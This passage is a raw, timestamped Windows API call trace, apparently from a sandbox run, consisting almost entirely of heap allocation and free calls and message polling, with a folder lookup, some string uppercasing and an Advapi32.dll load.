(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0168.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0168.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.846] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0168.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0168.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0168.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0168.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0168.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0168.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0168.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0168.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0168.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0168.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0168.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0168.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0168.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0168.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0168.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0168.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.849] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Microsoft", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x9e1ef8 [0168.849] FindClose (in: hFindFile=0x9e1ef8 | out: hFindFile=0x9e1ef8) returned 1 [0168.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0168.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0168.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0168.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0168.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0168.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0168.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0168.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0168.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0168.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0168.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0168.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0168.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0168.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0168.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0168.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0168.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0168.851] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0168.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0168.852] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.852] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.852] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0168.852] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.852] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.852] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.852] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.853] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0168.853] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0168.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0168.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.854] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.854] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0168.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0168.855] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.855] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0168.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0168.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0168.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0168.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.855] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0168.855] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, 